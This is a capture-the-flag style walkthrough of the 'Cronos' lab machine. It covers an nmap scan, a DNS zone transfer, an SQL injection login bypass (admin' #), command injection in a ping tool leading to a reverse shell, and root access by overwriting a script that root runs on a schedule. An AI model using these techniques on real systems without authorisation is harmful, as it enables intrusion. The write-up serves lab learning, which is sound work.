We execute a zone transfer using dig and got a virtual host to the admin page which is vulnerable to SQL injection.
Once logged in, we send the request through Burp and we can get command execution from a tool that performs ping and traceroute. Got reverse shell using python
We notice that root executes a php script every minute, and this script is owned by our user www-data. Replacing the php script with our code, and we get root
Tools used:
nmap, dig, burp
Nmap
# Nmap 7.80 scan initiated Tue Apr 14 22:04:44 2020 as: nmap -sC -sV -p 22,53,80 -oA nmap/cronos_all 10.10.10.13
Nmap scan report for 10.10.10.13
Host is up (0.056s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr 14 22:04:59 2020 -- 1 IP address (1 host up) scanned in 15.48 seconds
# dig axfr cronos.htb @10.10.10.13
; <<>> DiG 9.11.16-2-Debian <<>> axfr cronos.htb @10.10.10.13
;; global options: +cmd
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.10.10.13
admin.cronos.htb. 604800 IN A 10.10.10.13
ns1.cronos.htb. 604800 IN A 10.10.10.13
www.cronos.htb. 604800 IN A 10.10.10.13
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 56 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Tue Apr 14 22:30:14 EDT 2020
;; XFR size: 7 records (messages 1, bytes 203)
The interesting part here is admin.cronos.htb
HTTP
On the the admin page, we tried guessing a few usernames and passwords but got nothing. However when we tried a few SQLi I was able to login using the following:
Username: admin' #
Password: admin
Once logged in, we are redirected to this tool which allows us to ping and traceroute
A simple test shows that we can ping our box
On our Kali box, we can see the icmp packets.
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
00:35:40.334101 IP 10.10.10.13 > 10.10.14.38: ICMP echo request, id 31905, seq 1, length 64
00:35:40.334126 IP 10.10.14.38 > 10.10.10.13: ICMP echo reply, id 31905, seq 1, length 64
Exploit
We send this ping request to Burp and notice we got command execution
Request
Response
Using a python reverse shell as the payload and we get a shell as user www-data
www-data@cronos:/var/www$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@cronos:/var/www$
Privilege Escalation
Doing some enumeration on the box with linpeas.sh and the following jumped out.
The file is owned by our user and its executed by root. With that info, we replaced artisan with a reverse php script and we get a shell as root.
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9008
Ncat: Listening on 0.0.0.0:9008
Ncat: Connection from 10.10.10.13.
Ncat: Connection from 10.10.10.13:33386.
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
07:25:01 up 2:34, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
